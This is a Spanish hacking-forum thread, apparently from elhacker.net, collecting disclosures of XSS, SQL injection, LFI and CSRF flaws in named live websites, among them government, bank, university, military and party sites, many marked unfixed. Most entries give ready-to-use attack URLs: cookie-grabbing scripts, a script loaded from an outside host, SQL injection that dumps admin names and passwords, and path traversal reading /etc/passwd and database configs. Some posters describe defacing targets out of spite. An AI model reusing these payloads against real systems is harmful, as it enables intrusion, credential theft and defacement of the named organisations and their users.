Post para reportar de forma pública una vulnerabilidad de XSS o SQLinjection en un sitio web que no use software distribuido (es decir, que su código no sea accesible).
En caso de que sea software distribuido se puede crear un nuevo tema describiendo la vulnerabilidad.
Solo se permite la publicación de esta información en este tema, y no se puede crear un tema individual reportando este tipo de vulnerabilidades, en caso de hacerlo este será borrado.
El formato es el siguiente (ejemplo):
Sitio web: http://www.google.com/
Descubridor: sirdarckcat
URL del aviso: http://sirdarckcat.blogspot.com/2007/10/vulns-of-google-that-where-and-are-not.html
Fecha de descubrimiento: 27 de Julio del 2007
Fecha de notificación: 27 de Julio del 2007
Fecha de publicación: 13 de Octubre del 2007
Arreglado : Si, desde el 4 de Agosto del 2007
Información adicional: http://www.google.com/gwt/mdp/x/en/detect/1?manually=true&brand=sirdackcat&model=sirdarckcat.net%3Cscript%3Ealert(document.cookie);%3C/script%3E
Es importante notar que los siguientes campos son obligatorios:
Sitio web,
URL del aviso,
Descubridor,
Información adicionalSinembargo Descubridor puede quedar como Anónimo.
Información adicional deberá contener la dirección de enlace al PoC o a una captura de pantalla.
En caso de que sea un enlace este deberá estar entre etiquetas [
code][
/code].
Además siguiendo con la política de disclosure (ver reglas (http://foro.elhacker.net/reglas#II.A.2.a)), solo se aceptarán PoCs que:
CitarEn los foros públicos, la publicación de vulnerabilidades en sitios Web específicos, esta permitida, si y sólo si: ésta tiene un pagerank igual o superior a 4, fue publicada en otro lugar previamente, y el enlace se mantenga firme con lo estipulado en la sección II.A.2.b. En caso de que la vulnerabilidad sea de un software distribuido, se podrá describir la vulnerabilidad en el foro correspondiente. Sin embargo, en ese caso, esta prohibido colocar sitios Web vulnerables de terceros.
Es decir, URL del aviso debe ser una URL externa al foro, y es obligatoria (a menos que la vulnerabilidad ya haya sido arreglada).Si no tienen un blog donde publicar estas vulnerabilidades, o les da flojera hacerlo, les recomiendo http://txt.io/ es rapido y sencillo. Pueden publicar exactamente lo que pusieron aqui en el foro, pero es importante que tengamos una fuente a donde enlazar el descubrimiento de la vulnerabilidad, para evitar problemas con los sitios web.El código
bbcode del formato es:
Citar[b]Sitio web: [/b]
[b]Descubridor: [/b]
[b]URL del aviso: [/b]
[b]Fecha de descubrimiento: [/b]
[b]Fecha de notificación: [/b]
[b]Fecha de publicación: [/b]
[b]Arreglado: [/b]
[b]Información adicional: [/b]
[code][/code]
Fuera de esto, comentarios sobre las vulnerabilidades aqui comentadas deberán estar en otro post.
Esto se deberá hacer "citando" el mensaje en cuestión en un tema nuevo.
Si el comentario es de pertinencia solo al autor del mensaje, este se deberá mandar por MP, y no en un tema nuevo, de lo contrario será borrado sin aviso.
Es todo! Gracias :)
Saludos!!
Sitio web: www.lawebdelprgramdor.com
Descubridor: Xvan
URL del aviso: http://www.lawebdelprogramador.com/news/mostrar_new.php?id=38&texto=Hackers&n1=496610&n2=0&n3=0&n4=0&n5=0&n6=0&n7=0&n8=0&n9=0&n0=0
Fecha de descubrimiento: 25/05/2008
Fecha de notificación: 25/05/2008
Fecha de publicación: 25/05/2008
Arreglado: creo que todavia no
Información adicional: solo hay que modificar el valor del campo "texto" por un script
http://www.lawebdelprogramador.com/news/mostrar_new.php?id=270&texto=<script>alert()</script>&n1=480872&n2=0
Sitio Web Www.ForoActivo.coM (http://www.foroactivo.com)
Descubridor: Vengador de las Sombras
URL de aviso:http://argeniversohack.66ghz.com/index.php/topic,2002.msg4906/topicseen.html#msg4906 (http://argeniversohack.66ghz.com/index.php/topic,2002.msg4906/topicseen.html#msg4906)
Fecha de descubrimiento: 31 de Julio de 2008
Fecha de notificación: --
Fecha de publicación: 31 de Julio de 2008
Tipo: XSS
Información Adicional:
El archivo vulnerable es el de reportar abusos (/report_abuse.forum), por lo que todos los foros son vulnerables:
http://[Foro].foroactivo.net/report_abuse.forum?page=%2F%20<script>alert(/Fl4m1ng 0ur sk1llZ/)</script>&report=1
Sitio web: www.top-central.com
Descubridor: Eazy
URL del aviso: http://eazyrlz.blogspot.com/2008/09/xss-en-wwwtop-centralcom.html
Fecha de descubrimiento: 8/7/08
Fecha de notificación: 8/7/08
Fecha de publicación: 04 de Septiembre de 2008
Arreglado: No
Respuesta: Muchas gracias por avisarla, hay creditos en el codigo fuente.
Información adicional:
"><script>alert(/xss/.source)</script>
Sitio web: www.nexon.net
Descubridor: Eazy
URL del aviso: http://eazyrlz.blogspot.com/2008/09/xss-en-wwwnexonnet.html
Fecha de descubrimiento: 12/09/08
Fecha de notificación: 12/09/08
Fecha de publicación: 12/09/08
Arreglado: No
Información adicional:
"><script>alert(/xss/.source)</script>
Antes que nada hay que decir que todos los administradores de estos sitios webs fueron avisados de sus multiples fallas para que pudiesen ser corregidas antes de ser expuestas, solo un webmaster respondió y fue webtaller, el resto la mayoría los reparó solo en parte. esto es para tener un poco de consiencia al momento de crear un sitio web o manetener uno de que esto de la seguridad web no es algo para tomar a la ligera, antiguamente un xss era considerado de bajo riesgo pero con el tiempo ya se ha considerado medio alto dependiendo del caso ya que puedes no causar nada como la obtensión de privilegios de administración en los mismos sitios.
Ninguna web fue afectada.
Descubridor: todas por WHK.
La Nasa
http://mynasa.nasa.gov/portal/site/mynasa/template.'"><h1>XSS
La Nasa nuevamente
http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param=%68%74%74%70%3A%2F%2F%77%77%77%2E%6A%63%63%68%61%72%72%79%2E%63%6F%6D%2F%70%72%75%65%62%61%73%2F%6E%61%73%61%2E%67%6F%76%2F%77%68%6B%2E%61%73%78
MTV
http://www.mtvla.com/news/droplets/email_story_form.jhtml?title="><h1>XSS
Defcon
https://pics.defcon.org/misc.php?action=cookies
Editas tu cookie bbsessionhash:%3Ch1%3EXSS+by+WHK%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E
Telefónica
http://195.53.169.41/jsp/CDoResult.jsp?QUERYTYPE=32&QUERYTXT=lol&QUERYLEVEL=2&SESION=a';}%3C/script%3E%3Ch1%3EXSS%20by%20WHK%3Cscript%3E%3C!–&NOMLIB=tel_chile_lib|grupo_tel_chile_lib|salaprensa_lib&QUERYSTRING=&IDIOM=&FILEINI=default_cl&SALADEPRENSA=&PAIS=CL
Foros Terra
http://foros.terra.com.mx/portada.cfm?s=F&pCat=11"><br><br><br><h1>XSS
Descargas Terra
http://descargas.terra.es/index.phtml?&action=all&id_section=1"><script>alert(1) ;</script>&search="><br><h1>XSS
Simantec (de Norton Antivirus)
http://www.symantecstore.com/dr/v2/ec_main.entry25?page= ESUpgradeRenewal&client=Symantec&sid=41185&cid=2073aaaa"><br><br><br><h1>XSS%20by%20WHK<br><br><br>
Esest (de Nod32 Antivirus)
http://www.nod32.bg/ (en el buscador de arriba poner "><h1>XSS )
Infosecurityevent
http://www.infosecurityevent.com/App/homepage.cfm?keywords=%22%3E%3Ch1%3EXSS+by+WHK%3Cbr%3E%3C%2Fh1%3E&appname=100004&moduleid=42&siteadvsearch=1&collections=1%2C2%2C3%2C4%2C5%2C6%2C9&searchtype=all&displaytype=relevance&searchmethod=basic&fuseaction=search.results&go.x=14&go.y=8
Megaupload
http://www.megaupload.com/signup/es/index.php (petición POST al valor 'email' "><h1>XSS )
Winamp
http://www.winamp.com/skins/search/?s=m&q=;"></script><script>alert(/XSS/);</script>
Imageshack
http://reg.imageshack.us/content.php?page=email&q=abuse2/><h1>XSS
Webtaller
http://www.webtaller.com/regsystem/login.php?ref=/envios/enviar_articulo.php?id="><h1>XSS
Universidad Surcolombiana (Colombia)
http://portal.usco.edu.co:8080/portal/portal/pagina.jsp?id=70"><h1>XSS%20by%20WHK<script>alert(/XSS%20by%20WHK/);</script>&index=1"><h1><br>XSS
Universidad de Chile
http://www.uchile.cl/uchile.portal?_nfpb=true&_pageLabel=not&url=42454"><h1>XSS
Pontificia Universidad Católica de Chile
http://www.uc.cl/ (donde dice "buscar personas" poner "><h1>XSS )
Universidad Iberoamericana de México
http://enlinea3.uia.mx/www/busqueda_uia.cfm?busqueda=%22%3E%3Ch1%3EXSS
Universidad de Buenos Aires UBA (Argentina)
http://www.uba.ar/comunicacion/difusion/agenda/encurso.php?dia=7&mes="><h1>XSS7&?o=2007#4106
Universidade de São Paulo USP (Brasil)
http://noticias.usp.br/acontece/obterNoticia?codntc=17246&codnucjrn=1"><h1>XSS
Universidad Harvard (Estados Unidos)
https://www.pin1.harvard.edu/pin/submit-login (en datos poner "><h1>XSS )
Sourceforge
http://sourceforge.net/search/?type_of_search=soft&words=';"/></script><h1>XSS<script>alert();</script>
Softronic
http://zonealarm-antivirus.softonic.com/?refmkt=6aaaaa"><script>alert(/XSS by WHK/);</script>
WikiWix (Buscador Wikipedia)
http://es.wikiwix.com/index.php?action="><h1>XSS<br><br>?=es&bg=es
Nintendo
http://www.nintendo-europe.com/NOE/es/ES/search/search.jsp?searchText=';}}"></script><h1>XSS<script>alert();</script>&indexName=all
Sony
http://www.sony.es/search/Search.action?applicationtype=Search&searchtype=product&site=odw_es_ES?ion=es_ES_Search&start=1&page=ProductMultiSiteSearchResult&shortcut=true&query=';</script><script>alert();</script>&locale=es_ES&brand=default&allSections=true
Meanwhile
http://meanwhile.com/?domain=hackxcrack.com"><h1><br>XSS by WHK<script>&
SPAM(1)
http://www.SPAM(1)/top/search.php (en el buscador poner "><h1>XSS )
SPAM(3) (elhacker.org)
http://elhacker.org/ (en el buscador poner "><h1>XSS )
New-Bytes.net
http://md5.new-bytes.net/encoder.php (donde dice codificar poner '"><h1>XSS )
Codebreak.tk
http://codebreak.uni.cc/tools/shellcode.php (poner </textarea><h1>XSS )
ElHacker.net
http://ns2.elhacker.net/cgi-bin/birdcast.cgi (Crear una referencia con contenido HTML incrustado)
Dimitrix
http://www.dimitrix.es/youtube/ (poner </textarea><h1>XSS )
Piojosoft
http://www.piojosoft.com/index.php?sección=programas/buscatop&pclaves=<script>alert(/XSS/)</script>
Portalhacker.net
http://www.portalhacker.net/buscar.php (metodo post a un input llamado query ""><h1>XSS " mas el valor "ok " en el valor "buscar")
DarkNet.org
http://www.darknet.org/ (metodo GET al input 's' : ""><h1>XSS ")
BlindSec
http://www.blindsec.com/notes.php (Editar el texto escapando con un '</textarea>' y guardando)
johnny.ihackstuff
http://johnny.ihackstuff.com/index.php?searchword=';alert('XSS')// &option=com_search&Itemid=5
Las FARC
http://www.farcep.org/?node=3&op=search&date_range=E+0&search_string=%27%22%3E%3Ch1%3Etest&imageFiel
d.x=0&imageField.y='%22%3E%3Ch1%3Etest0<script>alert(/esto es un problema/);</script>
Universidad DUOC de Chile
http://mercadolaboral.duoc.cl/alerta.cfm?msg='%22%3E%3Ciframe%20src=http://xssed.com%3E
Zone-H
http://www.zone-h.org/index.php?searchword=';alert('XSS')//%20&option=com_search&Itemid=5
Banco Santander
http://www.santander.com/csgs/Satellite?accesibilidad=3&canal=CAccionistas&cid=1147087106975&empr=SA
NCorporativo&leng=es_ES&pagename=SANCorporativo/Page/SC_ContenedorBuscadorGeneral&pagina=99999999999
99999999'"><script>alert(/xss/);</script>
Anonymouse
http://anonymouse.org/cgi-bin/anon-email.cgi
POST: to=yo%40noexist.fakeeeeee&subject=<script>alert(2)</script>&text=<script>alert(1)</script>
Ejercito de Chile
http://www.ejercito.cl/busqueda/index.php
POST: PHPSESSID=478a586e7ac990faa11abde01c939ad8&texto=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pub_d esde=&pub_hasta=&contenido=0&image222.x=0&image222.y=0
Yahoo
http://es.search.yahoo.com/search?p=http%3A%2F%2Fwww.huifa.cl%2Fbuscador%2Fbuscar.php%3F%26cod_rubro
%3D%26cb%3D%26criterio%3D%3C%2Ftitle%3E%3Ch1%3E%3Cmarquee%3Emuajajajaja%3C%2Fmarquee%3E%3C%2Fh1%3E%3
Ctitle%3E&fr=yfp-t-501&ei=UTF-8&meta=vl%3D
Nota: las imagenes las retiré porque utilizaban demasiado espacio, ya las pondré nuevamente pero en miniaturas cuando estén listas.
Fuentes
http://www.jccharry.com/portada/component/content/article/51.html
http://xssed.com/archive/author=whk
Sitio web: www.ipsaportal.unina.it
Descubridor: Erik#
URL del aviso: http://netzeven.wordpress.com/2009/02/10/xss-en-ipsatotal-buscador/
Fecha de descubrimiento: 10.02.09
Fecha de notificación: ---
Fecha de publicación: 10.02.09
Arreglado: No
Información adicional: XSS en buscador
http://ipsaportal.unina.it/?s=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fwww.krews.es%2Fhackbyerik.png%22%3E&x=0&y=0
Sitio web: http://www.presidencia.gob.bo
Descubridor: N1GHTSCR34M
URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html
Fecha de descubrimiento: 17.02.09
Fecha de notificación: ---
Fecha de publicación: 17.02.09
Arreglado: No
Información adicional:
http://www.presidencia.gob.bo/prensa/Noticias.asp?id=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27VIEW1%27))
Sitio web: http://www.presidencia.gov.py
Descubridor: N1GHTSCR34M
URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html
Fecha de descubrimiento: 17.02.09
Fecha de notificación: ---
Fecha de publicación: 17.02.09
Arreglado: No
Información adicional:
http://www.presidencia.gov.py/detalle.asp?codigo=convert(int,(@@Version))
Sitio web: www.fotolog.com
Descubridor: FeDeX
URL del aviso: http://txt.io/t-agZ0eHQtaW9yDwsSB3R4dExpc3QY3aYCDA
Fecha de descubrimiento: Un dia en el año 2008
Fecha de notificación: --
Fecha de publicación: 18/jul/2009
Arreglado: No :)
Información adicional: Sale todo en la URL de aviso..
Sitio web: www.sgae.es
Descubridor: Dimitrix
URL del aviso: http://seguridad.dimitrix.es/index.php/2009/12/18/xss-en-la-sgae-pero-que-penita/
Fecha de descubrimiento: 18/12/09
Fecha de notificación: 18/12/09
Fecha de publicación: 18/12/09
Arreglado: No
Información adicional: Bueno, como ya sabreis la SGAE ha creado una lista con 200 webs que ellos opinan "Ilegales" que quieren cerrar sin órden judicial, y bueno como no tienen muchos cojones no la han publicado, pero como supongo que por cojones mi web (no la pongo por no hacer SPAM) está ahí, pues he decidido darle las gracias cambiando los colorines de su web:
(http://i214.photobucket.com/albums/cc173/dimitrix-es/XSS%20and%20Others/sgae.jpg)
http://www.sgae.es/jsp/email-es.jsp?link=[XSS]
Bueno para empezar el año os quería preparar una serie de XSS en distintas webs de partídos políticos, pero por la escasez de tiempo no he podido profundizar en este tema, así que os dejo estos dos:
PSOE
El primer XSS se encuentra en la parte de Suscripciones y aunque en realidad se centra en uno, hay muchos.
(http://i214.photobucket.com/albums/cc173/dimitrix-es/XSS%20and%20Others/xss-psoe.jpg)
http://www.psoe.es/generic/subscription.do?action=Password&type=newsletters&href=[XSS]
Otra cosa que encontré "escarbando" en la web del psoe es el panel administrador de tal:
https://www.psoe.es/generic/login_private.jsp
Y por último en el código fuente del panel administrador podremos ver un comentario de un botón entrar que pone "entrar-rojo"
ESPAÑA 2000
En la web de España 2000 queda un XSS muy muy viejo, que aunque ha cambiado la web, se puede acceder igualmente:
(http://i214.photobucket.com/albums/cc173/dimitrix-es/XSS%20and%20Others/xss-esp2000.jpg)
http://www.esp2000.org/v3/foto_grande.php?recordID=2862&cuerpo_img=[XSS]
Como curiosidad en la web de España 2000, si creamos un error en la web con por ejemplo el famoso "> aparecerá de título: "Welcome to the Frontpage"
http://esp2000.org/index.php?page=shop.brow%22%3Ese&category_id=5&vmcchk=1&option=com_virtuemart&Itemid=1
Saludos y hasta la próxima!
Fuente: http://seguridad.dimitrix.es/index.php/2010/01/02/xss-en-psoe-y-en-espana-2000/
Sitio web: http://www.minagri.gob.cl/
Descubridor: Ari-Slash
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-minagri-gob-cl/
Fecha de descubrimiento: 16 de enero de 2010
Fecha de notificación: 16 de enero de 2010
Fecha de publicación: 16 de enero de 2010
Arreglado: si 18 de enero de 2010 (ni siquiera un gracias ¬¬ )
Vulnerabilidad: LFI
http://www.minagri.gob.cl/tips/descargar.php?file=../include/php/conectaBD.php
http://www.minagri.gob.cl/tips/descargar.php?file=../../../../etc/passwd
Vulnerabilidad: XSS
http://www.minagri.gob.cl/buscar.php?txt_busca=d%22%3E%3Ciframe%20src=http://skydrive.cl/foro%3E%3C/iframe%3E%3C
saludos
Sitio web: lostambos.com.pe
Descubridor: Ari-Slash y el-pollo
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-lostambos-com-pe/
Fecha de descubrimiento: 17 de enero de 2010
Fecha de notificación: 17 de enero de 2010
Fecha de publicación: 17 de enero de 2010
Arreglado: Si 18 de Enero de 2010 (eliminaron el arhcivo download.php xD)
Vulnerabilidad: LFI
http://www.lostambos.com.pe/download.php?f=../
saludos
Sitio web: www.ceplag.edu.bo
Descubridor: Ari-Slash
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-ceplag-edu-bo/
Fecha de descubrimiento: 18 de enero de 2010
Fecha de notificación: 18 de enero de 2010
Fecha de publicación: 18 de enero de 2010
Arreglado: No
Vulnerabilidad: LFI
www.ceplag.edu.bo/php/descargar.php?file=
Sitio web: http://www.ongei.gob.pe <-- Oficina nacional de gobierno electronico e informatica
Descubridor: janito24
URL del aviso: http://h4x0red.blogspot.com/2010/01/xss-en-ongeigobpe.html
Fecha de descubrimiento: 18 de enero 2010
Fecha de notificación: 18 de enero 2010
Fecha de publicación: 18 de enero 2010
Arreglado: No
Información adicional: XSS simple en el buscador.
http://www.ongei.gob.pe/busquedas/ongei_resultado.asp?txt_parrafo_busq=a%22%3E%3Cscript%3Ealert()%3C/script%3E
Nota:
La pifia debe estar en todas las paginas .gob.pe al parecer las hizo la misma persona. Otro error http://www.ongei.gob.pe/busquedas/ongei_resultado.asp?txt_parrafo_busq=asdfasdfkaskdjf%F1lakjsd%F1lfkj%F1alsdjkf%F1laksjdf%F1lkjal%F1sldkfj%F1alskjdf%F1laksj xD no tiene desactivado los errores asi que debe ser facil encontrar un sqli o similar :S
Sitio web: http://www.hospitalvitarte.gob.pe/ <-- Ministerio de salud
Descubridor: Ari-Slash
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-hospitalvitarte-gob-pe/
Fecha de descubrimiento: 18 de enero 2010
Fecha de notificación: 18 de enero 2010
Fecha de publicación: 19 de enero 2010
Arreglado: No
Vulnerabilidad: LFI
http://www.hospitalvitarte.gob.pe/download.php?url=
saludos
Sitio web: http://www.ceoe.es/ceoe/search.search.action
http://www.isee.es/isee3/search.search.action
http://www.ceifor.es/ceifor/search.search.action
Descubridor: LeGNa29A
URL del aviso: http://legna29a.blogspot.com/2010/01/vulnerabilidades.html
Fecha de descubrimiento: 19/01/10
Fecha de notificación: 19/01/10
Fecha de publicación: 20/01/10
Arreglado:
Información adicional: XSS en los buscadores, los sites están relacionados.
<script>alert('XSS')</script>
Sitio web: http://localhost/ <-- Pagina de inicio Wamp (http://www.wampserver.com/)
Descubridor: janito24
URL del aviso: http://h4ckvi505.wordpress.com/2010/01/22/vulnerabilidad-en-localhost/
Fecha de descubrimiento: 22 de enero 2010
Fecha de notificación: 22 de enero 2010
Fecha de publicación: 22 de enero 2010
Arreglado: No
Información adicional: XSS en la variable lang.
http://localhost/?lang=%22%3E%3Ch3%3Exss%3C/h3%3E
Nota: :xD
Sitio web: http://m.tuenti.com
Descubridor: Dimitrix
Fuente: http://seguridad.dimitrix.es/index.php/2010/02/18/xss-parcial-en-tuenti-movil/
Fecha de descubrimiento: 14/2/10
Fecha de notificación: 14/2/10
Fecha de publicación: 17/2/10
Arreglado: No
Información adicional: XSS EN la variable "email" al enviar las invitaciones:
(http://i214.photobucket.com/albums/cc173/dimitrix-es/XSS%20and%20Others/xss_tuenti.jpg)
Sitio web: http://www.ejercito.cl
Descubridor: janito24
URL del aviso: http://h4ckvi505.wordpress.com/2010/02/19/xss-www-ejercito-cl-ejercito-de-chile/
Fecha de descubrimiento: 19 de febrero 2010
Fecha de notificación: 19 de febrero 2010
Fecha de publicación: 19 de febrero 2010
Arreglado: No
Información adicional: XSS en el error de mysql que se muestra :x
http://www.ejercito.cl/nuestro_ejercito/discursos.php?id=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Sitio web: http://www.megaupload.com
Descubridor: janito24
URL del aviso: http://h4ckvi505.wordpress.com/2010/02/19/csrf-www-megaupload-com/
Fecha de descubrimiento: 19 de febrero 2010
Fecha de notificación: 19 de febrero 2010
Fecha de publicación: 19 de febrero 2010
Arreglado: No
Información adicional: CSRF (Cambio de idioma arbitrario)
http://megaupload.com/?setlang=es a español
http://megaupload.com/?c=contact&setlang=de a aleman
http://www.megaupload.com/?d=9450P71D&setlang=fr a frances
NOTA: "TODAS" las urls de megaupload son vulnerables, por lo tanto desde cualquier parte pueden cambiar el idioma a quien quieran con tan solo mandarle el link
Sitio web: http://www.nngg.org
Descubridor: EgoPL
Fecha de descubrimiento: 22/08/09
Fecha de publicación: 16/05/10
URL del aviso: http://twitter.com/EgoPL/status/14108571687
Arreglado: No
Información Adicional:
El panel de admin esta en el subdominio intranet.
Sitio web: http://es.msn.com/
Descubridor: SH4V
URL del aviso: http://txt.io/sh4v
Fecha de descubrimiento: 18 de mayo de 2010
Fecha de notificación: 18 de mayo de 2010
Fecha de publicación: 18 de mayo de 2010
Arreglado: no
Vulnerabilidad: XSS
http://populus.es.msn.com/participa.aspx?nombre=";}if (1){alert(document.cookie);//
Sitio web: www.dragonjar.org
Descubridor: csaralg
URL del aviso: http://comunidad.dragonjar.org/f179/test-xss-10064/
Fecha de notificación: Miércoles 8 de Junio
Fecha de publicación: Miércoles 8 de Junio
Arreglado: No
Vulnerabilidad: XSS
http://comunidad.dragonjar.org/f179/test-xss-10064/#post27048
Sitio web: http://www.fuckbook.com
Descubridor: sh3n
URL del aviso: http://guideshen.blogspot.com/2010/07/xss-in-fuckbook.html
Fecha de descubrimiento: 10/07/2010
Fecha de notificación: 11/07/2010
Fecha de publicación: 11/07/2010
Arreglado : No, UNFIXED
Información adicional:
http://www.fuckbook.com/member/profile_sh3n.html
Sitio web: http://www.satt.gob.pe
Descubridor: T3kyla
URL del aviso: http://t3kyla.wordpress.com/2010/09/13/sql-injection-en-satt-gob-pe/
Fecha de descubrimiento: 12/09/2010
Fecha de notificación: 12/09/2010
Fecha de publicación: 12/09/2010
Arreglado : No
Información adicional:
http://www.satt.gob.pe/Servicios%20al%20Ciudadano/Servicio%20Atencion%20Virtual/SAV_Valida.asp?Persona_Activo=&Act=&txtUsuario=t3kyla%27%20or%20%27a%27=%27a&txtClave=123456
Sitio web: http://www.federacionchilenaderemo.cl
Descubridor: Ari-Slash
URL del aviso: h4ckvi505.wordpress.com/2010/09/20/federacion-chilena-del-remo/
Fecha de descubrimiento: 20 de septiembre 2010
Fecha de notificación: 20 de septiembre 2010
Fecha de publicación: 20 de septiembre 2010
Arreglado: No
Vulnerabilidad: SQLI en el buscador
nota: No doy mas info de codigo sql por posibles lamerias
saludos
Sitio web: www.almatec.com.ar
Descubridor: Ari-Slash
URL del aviso: h4ckvi505.wordpress.com/2010/09/25/vulnerabilidad-www-almatec-com-ar/
Fecha de descubrimiento: 20 Enero 2010
Fecha de notificación: 20 de Enero 2010
Fecha de publicación: 25 de septiembre 2010
Arreglado: Si, pero ahora da lugar a un SQLI
Vulnerabilidad: LFI, SQLI y BLIND SQLI
Informacion adicional: el arreglo consistio en dar un id unico a cada archivo que se subia, de la forma download.php?id=
pero esa solucion dio lugar a sqli, siempre tomando el 2 campo del select debido a que debian retornarse cierta cantidad de columnas.
LFI (reparado):
download.php?file=admin/includes/Class.DB.php
SQLI:
descargas2.php?id=4%20union%20select%20id,nombre,password,4%20from%20administrador%20where%20id=1;--
descargas2.php?id=4%20union%20select%20id,password,nombre,4%20from%20administrador%20where%20id=1;--
Sitio web: http://comunidad.terra.com
Descubridor: sh3n
URL del aviso: http://www.xssed.com/mirror/69836/
Fecha de descubrimiento: 12 de Octubre del 2010
Fecha de notificación: 12 de Octubre del 2010
Fecha de publicación: 14 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/aWUdux
Saludos
Hace unos dias publique otro post pero creo q fue borrado o movido, dejo una copia
Sitio web: http://search.discovery.com
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/10/discovery-channel-xshacked.html?spref=tw
Fecha de descubrimiento: 12 de Octubre del 2010
Fecha de notificación: 12 de Octubre del 2010
Fecha de publicación: 14 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/9MKuAi
P.D
Si por algun motivo eliminan este post agradeceria que me informaran
Sitio web: http://search.oracle.com/
Descubridor: sh3n
URL del aviso: http://www.xssed.com/mirror/69865/
Fecha de descubrimiento: 14 de Octubre del 2010
Fecha de notificación: 14 de Octubre del 2010
Fecha de publicación: 15 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/d56mSZ
Sitio web: http://webapp.iss.net/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/10/httpwebappissnet-xss-vuln-ibm-iss.html
Fecha de descubrimiento: 16 de Octubre del 2010
Fecha de notificación: 20 de Octubre del 2010
Fecha de publicación: 28 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/c8aZic
Post Data:
Sitio web: http://www.admin.cam.ac.uk/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/10/httpwwwadmincamacuk-xss-vuln-xshacked.html
Fecha de descubrimiento: 16 de Octubre del 2010
Fecha de notificación: 20 de Octubre del 2010
Fecha de publicación: 28 de Octubre del 2010
Arreglado : NO, UNFIXED
Información adicional:Cross-site scripting
poc: http://bit.ly/bJky87
Post Data:
Sitio web: http://www.pichincha.com/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/11/pichinchacom-ecuator-bank-xss-bug.html
Fecha de descubrimiento: 08 de Noviembre del 2010
Fecha de notificación: 09 de Noviembre del 2010
Fecha de publicación: 09 de Noviembre del 2010
Arreglado : NO, UNFIXED
Información adicional: Banco Ecuatoriano
poc: http://bit.ly/bzEtrC
Sitio web: https://www.suntrust.com/
Descubridor: sh3n
URL del aviso: http://xsstorm.blogspot.com/2010/11/suntrustcom-bank-xss-bug.html
Fecha de descubrimiento: 08 de Noviembre del 2010
Fecha de notificación: 09 de Noviembre del 2010
Fecha de publicación: 09 de Noviembre del 2010
Arreglado : NO, UNFIXED
Información adicional: Banco USA
poc: http://bit.ly/94jUw8
Post Data:
Sitio web:http://www.buenosaires.gov.ar/areas/educacion/establecimientos/index.php?idgestion=
Descubridor:clean735
URL del aviso:http://txt.io/clean735
Fecha de descubrimiento:10 de diciembre 2010
Fecha de notificación:10 de diciembre
Fecha de publicación: 10 de diciembre
Arreglado: no lo se
Información adicional:no m gusta macri. XSS en el buscador
http://www.buenosaires.gov.ar/areas/educacion/establecimientos/index.php?idgestion=0&idoferta&idsala=0&idjornada=0&idmodalidad=0&idtitulo=0&idbarrio&idcgpc&distrito&texto=%3Cimg+src%3D.+onerror%3Dalert%28String.fromCharCode%2877%2C97%2C99%2C114%2C105%2C95%2C110%2C97%2C122%2C105%29%29%3E&Buscar2=Buscar&redir=1&menu_id=10194
Sitio web: http://www.soy.es/
Descubridor: INETFRUIT +
Fecha de descubrimiento: 28 de Diciembre del 2010
Fecha de notificación: 28 de Diciembre del 2010
Fecha de publicación: 01 de Enero del 2011
Arreglado : no, unfixed.
Información adicional: Blogs gratis
http://soy.es/index.php?pag=indice&cat=1+and+1=2+union/**/select+0x30,0x31,0x32,concat%280x3A3078623464633064333A%29,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235--+--
Sitio web: http://tienda.vodafone.es
Descubridor: tragantras
URL del aviso: http://pastebin.com/8Q9789Y6
Fecha de descubrimiento: 17 Mayo del 2007
Fecha de notificación: 17 Mayo del 2007
Fecha de publicación: 17 Mayo del 2007
Arreglado: Not yet!
Información adicional:
XSS
http://tienda.vodafone.es/movil/samsung/galaxy_s_8gb?s=asdf%22%3Easd%3C/a%3E%3CsCrIpT%3Ealert%28%27xungo%20XSS!%27%29;%3C/sCrIpT%3E%3Csdf%20foo=%22
Sitio web: www.yoigo.com
Descubridor: tragantras
URL del aviso: http://pastebin.com/WcRqGqaW
Fecha de descubrimiento: 21 Mayo del 2007
Fecha de notificación: 21 Mayo del 2007
Fecha de publicación: 21 Mayo del 2007
Arreglado: Not yet!
Información adicional:
XSS
POC FIREFOX & SECURELESS WEB-BROWSERS
http://www.yoigo.com/buscador.php?buscar=%22%20/%3E%3Cscript%3Ealert%283%29;%3C/script%3E
POC CHROME:
http://www.yoigo.com/buscador.php?buscar=%22%3E%3Cscript%20src=http://ha.ckers.org/xss.js?
Sitio web: http://www.tvpublica.com.ar
Descubridor: franco_tuv
Fecha de descubrimiento: 20 de Julio del 2011
Fecha de notificación: 20 de Julio del 2011
Fecha de publicación: 23 de Julio del 2011
Arreglado : No
Información adicional:
http://www.tvpublica.com.ar/tvpublica/busqueda?searchText=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E&page=1
Sitio web: http://www.elpais.cr
Descubridor: franco_tuv
Fecha de descubrimiento: 22 de Julio del 2011
Fecha de notificación: 22 de Julio del 2011
Fecha de publicación: 23 de Julio del 2011
Arreglado : No
Información adicional:
SQLI
